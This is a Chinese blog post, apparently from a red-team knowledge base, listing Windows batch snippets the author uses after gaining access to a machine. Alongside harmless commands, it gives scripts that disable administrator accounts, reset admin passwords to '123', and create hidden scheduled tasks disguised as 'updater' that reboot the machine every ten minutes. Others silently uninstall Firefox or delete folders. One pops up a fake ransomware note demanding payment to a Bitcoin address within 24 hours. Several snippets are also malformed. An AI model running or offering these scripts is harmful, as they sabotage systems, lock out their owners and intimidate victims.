[ 红队知识库 ] 一些常用bat文件集合
博主介绍
博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
文章目录
- 博主介绍
- 一、系统程序操作
-
- 1、打开记事本
- 2、关闭记事本
- 3、打开注册表
- 4、弹出计算器
- 5、关闭计算器
- 6、锁屏
- 二、服务相关操作
-
- 1、开启mysql服务
- 2、关闭mysql服务
- 三、账号相关操作
-
- 1、禁用账号
- 2、启用账号
- 3、禁用管理员账号
- 四、计划任务相关操作
-
- 1、新建计划任务每隔1小时重启一次电脑
- 2、新建计划任务每隔10分钟重启一次电脑
- 五、浏览器相关操作
-
- 1、打开火狐浏览器
- 2、关闭火狐浏览器
- 3、卸载火狐浏览器
- 4、打开谷歌浏览器
- 5、打开谷歌浏览器&&访问站点
- 六、文件夹相关操作
-
- 1、创建文件夹
- 2、批量创建文件夹
- 3、打开文件夹
- 4、删除文件夹
- 七、文件夹相关操作
-
- 1、创建文件
- 2、批量创建文件
- 3、打开文件
- 4、删除文件
- 5、执行dir命令追加到同目录下123.txt
- 八、msg发送消息
常用bat文件,我一般用于拿到权限后的演示,当然也可以玩,有部分危险操作,请规范使用
一、系统程序操作
1、打开记事本
@echo off
start notepad.exe
exit
2、关闭记事本
@echo off
taskkill /f /im notepad.exe
exit
3、打开注册表
@echo off
regedit
exit
4、弹出计算器
@echo off
start calc.exe
5、关闭计算器
@echo off
taskkill /f /im CalculatorApp.exe
exit
6、锁屏
rundll32.exe user32.dll LockWorkStation
二、服务相关操作
1、开启mysql服务
@echo off
net start mysql
echo mysql 服务已启动
2、关闭mysql服务
@echo off
net stop "MySQL"
echo MySQL 服务已关闭!
三、账号相关操作
1、禁用账号
@echo off
net user 用户名 /active:no
exit
2、启用账号
@echo off
net user 用户名 /active:yes
exit
3、禁用管理员账号
@echo off
net user Administrator /active:no
net user admin /active:no
exit
## 4、修改管理员账号密码为123
```bash
@echo off
net user administrator “123”
net user admin “123”
exit
四、计划任务相关操作
1、新建计划任务每隔1小时重启一次电脑
schtasks /create /tn updater /tr "powershell.exe -nop -w hidden -c shutdown -r" /sc hourly /mo 1
2、新建计划任务每隔10分钟重启一次电脑
schtasks /create /tn updater /tr "powershell.exe -nop -w hidden -c shutdown -r" /sc minute /mo 10
五、浏览器相关操作
1、打开火狐浏览器
@echo off
"C:\Program Files\Mozilla Firefox\firefox.exe"
pause
2、关闭火狐浏览器
@echo off
taskkill /f /im firefox.exe
pause
3、卸载火狐浏览器
@echo off
echo 开始卸载火狐浏览器...
"%PROGRAMFILES(X86)%\Mozilla Firefox\uninstall\helper.exe" /S
echo 卸载完成!
4、打开谷歌浏览器
@echo off
start chrome http://10.10.12.12
pause
5、打开谷歌浏览器&&访问站点
@echo off
start chrome http://10.10.12.12
www.google.com
pause
六、文件夹相关操作
1、创建文件夹
@echo off
md C:\hack1
echo 文件创建完毕
2、批量创建文件夹
@echo off
echo 正在创建hack0.txt~hack100.txt共一百个文本文件......
for /l %%i in (0, 1, 99) do (
md hack%%i
)
echo 文件创建完毕
3、打开文件夹
@echo off
start C:\hack1
echo 文件打开完毕
4、删除文件夹
@echo off
rd /s/q C:\hack%%i
echo 文件删除完毕
七、文件夹相关操作
1、创建文件
@echo off
md C:\hack1.txt
echo 文件创建完毕
2、批量创建文件
@echo off
echo 正在创建hack0.txt~hack100.txt共一百个文本文件......
for /l %%i in (0, 1, 99) do (
echo 我是hack%%i.txt文件 >> hack%%i.txt
)
echo 文件创建完毕
3、打开文件
@echo off
start C:\hack1.txt
echo 文件打开完毕
4、删除文件
@echo off
rd /s/q C:\hack1.txt
echo 文件删除完毕
5、执行dir命令追加到同目录下123.txt
@echo off
dir c:\windows\ >> 123.txt
exit
八、msg发送消息
语法:msg /server:对端IP地址 * “hello”
举例如下:
@echo off
msg /server:localhost * "hello"
msg /server:localhost * "I me hack"
msg /server:localhost * "I uploaded a system virus such as CIH on your computer"
msg /server:localhost * "I uploaded a small postman etc. worm on your computer"
msg /server:localhost * "I uploaded Hack.Nether.Client and other Trojans on your computer"
msg /server:localhost * "I uploaded a script virus like VBS.Happytime on your computer"
msg /server:localhost * "I uploaded macro viruses like Macro.Melissa on your computer"
msg /server:localhost * "I uploaded a backdoor virus like Backdoor.IRCBot on your computer"
msg /server:localhost * "I uploaded a virus planter virus such as Dropper.BingHe2.2C on your computer"
msg /server:localhost * "I uploaded a destructive program virus such as Harm.formatC.f on your computer"
msg /server:localhost * "I uploaded joke viruses like Joke.Girlghost on your computer"
msg /server:localhost * "I uploaded bundles and viruses like Binder.killsys on your computer"
msg /server:localhost * "If you don't want these viruses to execute on your computer"
msg /server:localhost * "Please remit 10000 Russell to your 1HrA3RRipdtCeSfzLGY611wcrH3SDjyrHj account"
msg /server:localhost * "Don't think about deleting them, you're too late"
msg /server:localhost * "You still have 24 hours"
exit